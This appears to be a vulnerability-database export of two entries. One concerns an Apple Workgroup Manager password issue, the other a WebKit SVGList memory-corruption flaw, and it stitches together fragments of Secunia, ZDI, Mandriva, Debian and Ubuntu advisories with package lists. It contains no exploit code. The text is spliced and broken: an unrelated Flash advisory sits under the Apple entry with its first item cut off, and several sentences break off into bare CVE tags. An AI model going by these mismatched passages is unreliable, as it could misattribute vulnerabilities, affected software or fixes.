|
var-200610-0022
|
User interface inconsistency in Workgroup Manager in Apple Mac OS X 10.4 through 10.4.7 appears to allow administrators to change the authentication type from crypt to ShadowHash passwords for accounts in a NetInfo parent, when such an operation is not actually supported, which could result in less secure password management than intended. Apple Workgroup Manager fails to properly enable ShadowHash passwords in a NetInfo parent. Workgroup Manager may appear to use ShadowHash passwords when crypt is used. Adobe Flash Player fails to properly handle malformed strings. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code. Apple Mac OS X is prone to multiple security vulnerabilities.
These issue affect Mac OS X and various applications including CFNetwork, Safari, Kernel, ImageIO, LoginWindow, System Preferences, QuickDraw Manager, and Workgroup Manager.
Apple Mac OS X versions prior to 10.4.8 are vulnerable to these issues. There are loopholes in the implementation of Workgroup Manager. Remote administrators can change the encryption method of secret password authentication in network information, when a real password is not actually enabled.
----------------------------------------------------------------------
Want to work within IT-Security?
Secunia is expanding its team of highly skilled security experts.
We will help with relocation and obtaining a work permit.
Currently the following type of positions are available:
http://secunia.com/quality_assurance_analyst/
http://secunia.com/web_application_security_specialist/
http://secunia.com/hardcore_disassembler_and_reverse_engineer/
----------------------------------------------------------------------
TITLE:
Adobe Flash Player Multiple Unspecified Vulnerabilities
SECUNIA ADVISORY ID:
SA21865
VERIFY ADVISORY:
http://secunia.com/advisories/21865/
CRITICAL:
Highly critical
IMPACT:
Security Bypass, System access
WHERE:
>From remote
SOFTWARE:
Macromedia Flash 8.x
http://secunia.com/product/7024/
Macromedia Flash MX 2004
http://secunia.com/product/3192/
Macromedia Flash MX Professional 2004
http://secunia.com/product/3191/
Macromedia Flash Player 7.x
http://secunia.com/product/2634/
Macromedia Flash Player 8.x
http://secunia.com/product/6153/
Macromedia Flex 1.x
http://secunia.com/product/5246/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Flash Player,
which can be exploited by malicious people to bypass certain security
restrictions or compromise a user's system. visiting a malicious website.
2) An unspecified error can be exploited to bypass the
"allowScriptAccess" option.
3) Unspecified errors exist in the way the ActiveX control is invoked
by Microsoft Office products on Windows.
SOLUTION:
Update to version 9.0.16.0 or another fixed version (see the vendor
advisory for details).
PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Stuart Pearson, Computer Terrorism UK Ltd, for
reporting one of the vulnerabilities.
2) Reported by the vendor.
3) Reported by the vendor.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb06-11.html
OTHER REFERENCES:
Microsoft:
http://www.microsoft.com/technet/security/advisory/925143.mspx
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
|
|
var-200905-0505
|
Array index error in the insertItemBefore method in WebKit, as used in Apple Safari before 3.2.3 and 4 Public Beta, iPhone OS 1.0 through 2.2.1, iPhone OS for iPod touch 1.1 through 2.2.1, Google Chrome Stable before 1.0.154.65, and possibly other products allows remote attackers to execute arbitrary code via a document with a SVGPathList data structure containing a negative index in the (1) SVGTransformList, (2) SVGStringList, (3) SVGNumberList, (4) SVGPathSegList, (5) SVGPointList, or (6) SVGLengthList SVGList object, which triggers memory corruption. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.The specific flaw exists during the parsing of malformed SVGLists via the SVGPathList data structure, the following lists are affected: SVGTransformList, SVGStringList, SVGNumberList, SVGPathSegList, SVGPointList, SVGLengthList. When a negative index argument is suppled to the insertItemBefore() method, a memory corruption occurs resulting in the ability to execute arbitrary code. WebKit is prone to a remote memory-corruption vulnerability. Failed exploit attempts will result in a denial-of-service condition.
The issue also affects the following:
Apple Safari prior to 3.2.3
Apple Mac OS X v10.5 through v10.5.6,
Apple Mac OS X Server v10.5 through v10.5.6
Google Chrome prior to 1.0.154.65. Safari is the web browser bundled by default in the Apple operating system. There is a memory corruption vulnerability in the processing of SVGList objects in WebKit in Safari. Visiting malicious websites will lead to arbitrary code execution. Safari has multiple input validation errors in its handling of the feed: URL, and accessing a malicious feed: URL can lead to arbitrary JavaScript execution. NOTE: the
JBIG2Stream.cxx vector may overlap CVE-2009-1179. (CVE-2009-0791). (CVE-2009-1709).
This update provides a solution to this vulnerability. (CVE-2009-1687). (CVE-2009-1690). (CVE-2009-0689).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2702
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1687
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1725
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1690
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0689
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0945
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.1:
c08161eacba6cdb1b0ba26babe5f8cc5 2009.1/i586/kdelibs4-core-4.2.4-0.8mdv2009.1.i586.rpm
933468cf4109252dac5119edd958f73d 2009.1/i586/kdelibs4-devel-4.2.4-0.8mdv2009.1.i586.rpm
96703a0ef0baf299647ff27d64cb0680 2009.1/i586/libkde3support4-4.2.4-0.8mdv2009.1.i586.rpm
e5f60ba41e5919fa77c313b204e1f712 2009.1/i586/libkdecore5-4.2.4-0.8mdv2009.1.i586.rpm
cf8af6e467cd1585c44e1cce01362526 2009.1/i586/libkdefakes5-4.2.4-0.8mdv2009.1.i586.rpm
1c9c04b5f6c0c59d2e5860b077e0c6e3 2009.1/i586/libkdesu5-4.2.4-0.8mdv2009.1.i586.rpm
89fe7c33c7e5bcc23595560ae4664bf6 2009.1/i586/libkdeui5-4.2.4-0.8mdv2009.1.i586.rpm
30b73ef58ac3a45ff86756ad09d0d555 2009.1/i586/libkdnssd4-4.2.4-0.8mdv2009.1.i586.rpm
a1f00af00ea7e52d9f187f1fe5ccdfe2 2009.1/i586/libkfile4-4.2.4-0.8mdv2009.1.i586.rpm
553486988b945307ee038cb41dcb76e6 2009.1/i586/libkhtml5-4.2.4-0.8mdv2009.1.i586.rpm
9d9501ff70e709c5ea32b35aa985688a 2009.1/i586/libkimproxy4-4.2.4-0.8mdv2009.1.i586.rpm
a2ec3f440eb6cf545abbc63a3d34c1e5 2009.1/i586/libkio5-4.2.4-0.8mdv2009.1.i586.rpm
4168e955b60a5a69d8f1e085b30d0424 2009.1/i586/libkjs4-4.2.4-0.8mdv2009.1.i586.rpm
bfcece9c73348c6415c48ec266877908 2009.1/i586/libkjsapi4-4.2.4-0.8mdv2009.1.i586.rpm
228ca7dc2a86fdc868a5937b16a7a08c 2009.1/i586/libkjsembed4-4.2.4-0.8mdv2009.1.i586.rpm
f6297ae0630eb6207895df9f2f971eb6 2009.1/i586/libkmediaplayer4-4.2.4-0.8mdv2009.1.i586.rpm
cf6113c17858d5e6e3c0e04622f8a66c 2009.1/i586/libknewstuff2_4-4.2.4-0.8mdv2009.1.i586.rpm
da55a2f428ad020834f7b91c0023ecf6 2009.1/i586/libknotifyconfig4-4.2.4-0.8mdv2009.1.i586.rpm
9fef466138ff78a3d6d3244998a9ba30 2009.1/i586/libkntlm4-4.2.4-0.8mdv2009.1.i586.rpm
4f7c0ad254ec1990f5dab1c0b959629d 2009.1/i586/libkparts4-4.2.4-0.8mdv2009.1.i586.rpm
8c58d6a9a6ec7fc21f287b2f4c2e9858 2009.1/i586/libkpty4-4.2.4-0.8mdv2009.1.i586.rpm
8ed500d050b95560d7eff6db26fa05ee 2009.1/i586/libkrosscore4-4.2.4-0.8mdv2009.1.i586.rpm
2d8d12d8a7bbfe18f6b04b9807795077 2009.1/i586/libkrossui4-4.2.4-0.8mdv2009.1.i586.rpm
8cc5c226e381b122983440b3440c1476 2009.1/i586/libktexteditor4-4.2.4-0.8mdv2009.1.i586.rpm
3c53941130fb8cc6d12b8cdea488f536 2009.1/i586/libkunittest4-4.2.4-0.8mdv2009.1.i586.rpm
3996bfcff0b2465c39c6ccdb8367f401 2009.1/i586/libkutils4-4.2.4-0.8mdv2009.1.i586.rpm
129a26ab20c792994113b5db00b7f7c4 2009.1/i586/libnepomuk4-4.2.4-0.8mdv2009.1.i586.rpm
0b88090e1cba0db59a3fb85c34e6b726 2009.1/i586/libplasma3-4.2.4-0.8mdv2009.1.i586.rpm
79b484a6c8e20db156fbe130c81e2001 2009.1/i586/libsolid4-4.2.4-0.8mdv2009.1.i586.rpm
ddd09e03af15f421b2e38b6f06c0247a 2009.1/i586/libthreadweaver4-4.2.4-0.8mdv2009.1.i586.rpm
fe70dc01416cc986d1e19c15a0b5cfa7 2009.1/SRPMS/kdelibs4-4.2.4-0.8mdv2009.1.src.rpm
Mandriva Linux 2009.1/X86_64:
89f77418ccda86b51c7d32d011e88e9b 2009.1/x86_64/kdelibs4-core-4.2.4-0.8mdv2009.1.x86_64.rpm
d0b009e595350648b12cca1ee094802e 2009.1/x86_64/kdelibs4-devel-4.2.4-0.8mdv2009.1.x86_64.rpm
03db494c356e0b0823ddf697d42c0f50 2009.1/x86_64/lib64kde3support4-4.2.4-0.8mdv2009.1.x86_64.rpm
6d98531ba95a096fd49801f7df452776 2009.1/x86_64/lib64kdecore5-4.2.4-0.8mdv2009.1.x86_64.rpm
bf3845f586eeeaafab5e25442f4d8950 2009.1/x86_64/lib64kdefakes5-4.2.4-0.8mdv2009.1.x86_64.rpm
b9767fb69262886d60a7844ad6569e27 2009.1/x86_64/lib64kdesu5-4.2.4-0.8mdv2009.1.x86_64.rpm
d709c9fb8874c432d1b4e415e9c06858 2009.1/x86_64/lib64kdeui5-4.2.4-0.8mdv2009.1.x86_64.rpm
6d062780a7629eed7e93ab9e66daf633 2009.1/x86_64/lib64kdnssd4-4.2.4-0.8mdv2009.1.x86_64.rpm
f39c44bc7572d06921061c0ac5ef78c9 2009.1/x86_64/lib64kfile4-4.2.4-0.8mdv2009.1.x86_64.rpm
90f8ecd4967830ebff3b81732162fe33 2009.1/x86_64/lib64khtml5-4.2.4-0.8mdv2009.1.x86_64.rpm
005d7de69a0063a8dc396b9dffdf20ed 2009.1/x86_64/lib64kimproxy4-4.2.4-0.8mdv2009.1.x86_64.rpm
3924d83bf43990f7a7ba5d2eea29ef5d 2009.1/x86_64/lib64kio5-4.2.4-0.8mdv2009.1.x86_64.rpm
9124f0ce5f1643e4310ef0bfc5fda970 2009.1/x86_64/lib64kjs4-4.2.4-0.8mdv2009.1.x86_64.rpm
573504d0c305e757b3c163b9132264e4 2009.1/x86_64/lib64kjsapi4-4.2.4-0.8mdv2009.1.x86_64.rpm
917e5b175a3a5480e848dee6201e99d9 2009.1/x86_64/lib64kjsembed4-4.2.4-0.8mdv2009.1.x86_64.rpm
604cce29c11b2452b2744ff72e248b7c 2009.1/x86_64/lib64kmediaplayer4-4.2.4-0.8mdv2009.1.x86_64.rpm
bd75d3e4feaa98a3659ae5d113fe45f6 2009.1/x86_64/lib64knewstuff2_4-4.2.4-0.8mdv2009.1.x86_64.rpm
0a7d48b91c673f5908ce2d47a77746e2 2009.1/x86_64/lib64knotifyconfig4-4.2.4-0.8mdv2009.1.x86_64.rpm
a91967cfec8b470cc7520ac17590d41b 2009.1/x86_64/lib64kntlm4-4.2.4-0.8mdv2009.1.x86_64.rpm
0159bb033c507f20fb8bd77a7a8be43a 2009.1/x86_64/lib64kparts4-4.2.4-0.8mdv2009.1.x86_64.rpm
a062d0124cdea9dfcafb82ed2c5dfd54 2009.1/x86_64/lib64kpty4-4.2.4-0.8mdv2009.1.x86_64.rpm
8c0950479a23531a03836f7744d6b90d 2009.1/x86_64/lib64krosscore4-4.2.4-0.8mdv2009.1.x86_64.rpm
ca61efacf989bd4421d2c88abc440e3f 2009.1/x86_64/lib64krossui4-4.2.4-0.8mdv2009.1.x86_64.rpm
bcd31e87995de0f86ad9c363e87ea0d4 2009.1/x86_64/lib64ktexteditor4-4.2.4-0.8mdv2009.1.x86_64.rpm
23a0f2c640a20dd1be2b4475a9102cd6 2009.1/x86_64/lib64kunittest4-4.2.4-0.8mdv2009.1.x86_64.rpm
e49987a6d8016b6ac39011b6cac0b570 2009.1/x86_64/lib64kutils4-4.2.4-0.8mdv2009.1.x86_64.rpm
90d6806fa9dcd2ac1b71fc3b72dd4f81 2009.1/x86_64/lib64nepomuk4-4.2.4-0.8mdv2009.1.x86_64.rpm
4808080c578223d0bcb156e78f5d661f 2009.1/x86_64/lib64plasma3-4.2.4-0.8mdv2009.1.x86_64.rpm
e8cecb137634dfc738617b67a6d34122 2009.1/x86_64/lib64solid4-4.2.4-0.8mdv2009.1.x86_64.rpm
35c8778eaaa5465a8f15c27a57d8ed60 2009.1/x86_64/lib64threadweaver4-4.2.4-0.8mdv2009.1.x86_64.rpm
fe70dc01416cc986d1e19c15a0b5cfa7 2009.1/SRPMS/kdelibs4-4.2.4-0.8mdv2009.1.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. ZDI-09-022: Apple Safari Malformed SVGList Parsing Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-022
May 13, 2009
-- CVE ID:
CVE-2009-0945
-- Affected Vendors:
Apple
-- Affected Products:
Apple Safari
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6960.
-- Vendor Response:
Apple has issued an update to correct this vulnerability. More
details can be found at:
http://support.apple.com/kb/HT3549
-- Disclosure Timeline:
2009-03-19 - Vulnerability reported to vendor
2009-05-13 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Nils
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
. (CVE-2009-0945)
Several flaws were discovered in the QtWebKit browser and JavaScript
engines. (CVE-2009-1699, CVE-2009-1713)
It was discovered that QtWebKit did not prevent the loading of local Java
applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1950 security@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
December 12, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : webkit
Vulnerability : several
Problem type : remote (local)
Debian-specific: no
CVE Id : CVE-2009-0945 CVE-2009-1687 CVE-2009-1690 CVE-2009-1698
CVE-2009-1711 CVE-2009-1712 CVE-2009-1725 CVE-2009-1714
CVE-2009-1710 CVE-2009-1697 CVE-2009-1695 CVE-2009-1693
CVE-2009-1694 CVE-2009-1681 CVE-2009-1684 CVE-2009-1692
Debian Bug : 532724 532725 534946 535793 538346
Several vulnerabilities have been discovered in webkit, a Web content engine
library for Gtk+.
CVE-2009-1711
WebKit does not properly initialize memory for Attr DOM objects, which allows
remote attackers to execute arbitrary code or cause a denial of service
(application crash) via a crafted HTML document.
CVE-2009-1725
WebKit do not properly handle numeric character references, which allows remote
attackers to execute arbitrary code or cause a denial of service (memory
corruption and application crash) via a crafted HTML document.
CVE-2009-1714
Cross-site scripting (XSS) vulnerability in Web Inspector in WebKit allows
user-assisted remote attackers to inject arbitrary web script or HTML, and read
local files, via vectors related to the improper escaping of HTML attributes.
CVE-2009-1710
WebKit allows remote attackers to spoof the browser's display of the host name,
security indicators, and unspecified other UI elements via a custom cursor in
conjunction with a modified CSS3 hotspot property.
CVE-2009-1697
CRLF injection vulnerability in WebKit allows remote attackers to inject HTTP
headers and bypass the Same Origin Policy via a crafted HTML document, related
to cross-site scripting (XSS) attacks that depend on communication with
arbitrary web sites on the same server through use of XMLHttpRequest without a
Host header.
CVE-2009-1695
Cross-site scripting (XSS) vulnerability in WebKit allows remote attackers to
inject arbitrary web script or HTML via vectors involving access to frame
contents after completion of a page transition.
CVE-2009-1693
WebKit allows remote attackers to read images from arbitrary web sites via a
CANVAS element with an SVG image, related to a "cross-site image capture issue."
CVE-2009-1694
WebKit does not properly handle redirects, which allows remote attackers to read
images from arbitrary web sites via vectors involving a CANVAS element and
redirection, related to a "cross-site image capture issue."
CVE-2009-1681
WebKit does not prevent web sites from loading third-party content into a
subframe, which allows remote attackers to bypass the Same Origin Policy and
conduct "clickjacking" attacks via a crafted HTML document.
CVE-2009-1684
Cross-site scripting (XSS) vulnerability in WebKit allows remote attackers to
inject arbitrary web script or HTML via an event handler that triggers script
execution in the context of the next loaded document.
CVE-2009-1692
WebKit allows remote attackers to cause a denial of service (memory consumption
or device reset) via a web page containing an HTMLSelectElement object with a
large length attribute, related to the length property of a Select object.
For the stable distribution (lenny), these problems has been fixed in
version 1.0.1-4+lenny2.
For the testing distribution (squeeze) and the unstable distribution
(sid), these problems have been fixed in version 1.1.16-1.
We recommend that you upgrade your webkit package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/w/webkit/webkit_1.0.1.orig.tar.gz
Size/MD5 checksum: 13418752 4de68a5773998bea14e8939aa341c466
http://security.debian.org/pool/updates/main/w/webkit/webkit_1.0.1-4+lenny2.diff.gz
Size/MD5 checksum: 35369 506c8f2fef73a9fc856264f11a3ad27e
http://security.debian.org/pool/updates/main/w/webkit/webkit_1.0.1-4+lenny2.dsc
Size/MD5 checksum: 1447 b5f01d6428f01d79bfe18338064452ab
Architecture independent packages:
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-dev_1.0.1-4+lenny2_all.deb
Size/MD5 checksum: 35164 df682bbcd13389c2f50002c2aaf7347b
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_alpha.deb
Size/MD5 checksum: 65193740 fc8b613c9c41ef0f0d3856e7ee3deeae
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_alpha.deb
Size/MD5 checksum: 4254938 252b95b962bda11c000f9c0543673c1b
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_amd64.deb
Size/MD5 checksum: 3502994 4a96cad1e302e7303d41d6f866215da4
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_amd64.deb
Size/MD5 checksum: 62518476 d723a8c76b373026752b6f68e5fc4950
arm architecture (ARM)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_arm.deb
Size/MD5 checksum: 2721324 1fac2f59ffa9e3d7b8697aae262f09e4
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_arm.deb
Size/MD5 checksum: 61478724 260faea7d5ba766268faad888b3e61ff
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_armel.deb
Size/MD5 checksum: 2770654 5b88754e9804d9290537afdf6127643a
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_armel.deb
Size/MD5 checksum: 59892062 99c8f13257a054f42686ab9c6329d490
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_hppa.deb
Size/MD5 checksum: 3869020 c61be734b6511788e8cc235a5d672eab
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_hppa.deb
Size/MD5 checksum: 63935342 f1db2bd7b5c22e257c74100798017f30
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 62161744 f89fc6ac6d1110cabe47dd9184c9a9ca
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_i386.deb
Size/MD5 checksum: 3016584 b854f5294527adac80e9776efed37cd7
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_ia64.deb
Size/MD5 checksum: 5547624 2bd2100a345089282117317a9ab2e7d1
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_ia64.deb
Size/MD5 checksum: 62685224 5eaff5d431cf4a85beeaa0b66c91958c
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_mips.deb
Size/MD5 checksum: 3109134 a680a8f105a19bf1b21a5034c14c4822
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_mips.deb
Size/MD5 checksum: 64547832 dd440891a1861262bc92deb0a1ead013
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_mipsel.deb
Size/MD5 checksum: 2992848 952d643be475c35e253a8757075cd41b
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_mipsel.deb
Size/MD5 checksum: 62135970 7cd635047e3f9bd000ff4547a47eaaec
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 3456914 6fc856a50b3f899c36381ed8d51af44e
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_s390.deb
Size/MD5 checksum: 64385860 98ded86952a2c6714ceba76a4a98c35b
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 63621854 f0dd17453bc09fdc05c119faf2212d70
http://security.debian.org/pool/updates/main/w/webkit/libwebkit-1.0-1_1.0.1-4+lenny2_sparc.deb
Size/MD5 checksum: 3499170 3f2084d6416459ce1416bd6f6f2845e3
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iEYEARECAAYFAksjbAYACgkQNxpp46476aqm7wCaAk6WARfBzzrdYYoxAUKA5weL
V5YAmwRkz4XNwdcqnPzdeDzoakljqf1s
=DBEQ
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. ===========================================================
Ubuntu Security Notice USN-822-1 August 24, 2009
kde4libs, kdelibs vulnerabilities
CVE-2009-0945, CVE-2009-1687, CVE-2009-1690, CVE-2009-1698
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.04 LTS:
kdelibs4c2a 4:3.5.10-0ubuntu1~hardy1.2
Ubuntu 8.10:
kdelibs4c2a 4:3.5.10-0ubuntu6.1
kdelibs5 4:4.1.4-0ubuntu1~intrepid1.2
Ubuntu 9.04:
kdelibs4c2a 4:3.5.10.dfsg.1-1ubuntu8.1
kdelibs5 4:4.2.2-0ubuntu5.1
After a standard system upgrade you need to restart your session to effect
the necessary changes.
Details follow:
It was discovered that KDE-Libs did not properly handle certain malformed
SVG images. This
issue only affected Ubuntu 9.04. (CVE-2009-0945)
It was discovered that the KDE JavaScript garbage collector did not
properly handle memory allocation failures. (CVE-2009-1687)
It was discovered that KDE-Libs did not properly handle HTML content in the
head element. (CVE-2009-1690)
It was discovered that KDE-Libs did not properly handle the Cascading Style
Sheets (CSS) attr function call. (CVE-2009-1698)
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2.diff.gz
Size/MD5: 1809719 988ba0b3fcdebaacd489ef624af90d52
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2.dsc
Size/MD5: 1729 c2ba26fd1969292837be77339835463e
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10.orig.tar.gz
Size/MD5: 18631467 5eeb6f132e386668a0395d4d426d495e
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 7326386 15016f77751a853d96fbc549bdd0a487
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 25454764 b8e521c8bfc228667701baad29f9ea0b
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.5.10-0ubuntu1~hardy1.2_all.deb
Size/MD5: 9322 8a87b3a4fed9f227bb9e2eb0c0cd4829
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 26758194 806e9679c84113d44a6fdcb3827e22b6
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 1381550 739025e9a5f87b174b1b099b8c1f3e4f
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_amd64.deb
Size/MD5: 10654972 04e9b1429bb914d202bfedfc652dab2f
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 25990732 a09812c65c6e8d93ed21591cee340396
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 1410600 4f6d363ac598ecf83ab910e920cb08b0
http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_i386.deb
Size/MD5: 9614618 de2bdf46fa444443af067acdb288d758
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 25971080 5073531043650dac33a01175fd9ba304
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 1375956 fbcbdc659fc44128a4bf37afdc3d466b
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_lpia.deb
Size/MD5: 9642602 904999dc74b11f078c50b9798be80b41
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 27656762 88ea3f12cee10e81fe212f604697ee87
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4-dev_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 1393490 7b6d787cba530e950ac4e783693cbce9
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs4c2a_3.5.10-0ubuntu1~hardy1.2_powerpc.deb
Size/MD5: 10453190 a09dadf79f488712a21d49a829e26c79
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/k/kdelibs/kdelibs-dbg_3.5.10-0ubuntu1~hardy1.2_sparc.deb
Size/MD5: 25026168 a2066fad04e4b92cb4374a10f3ca4912
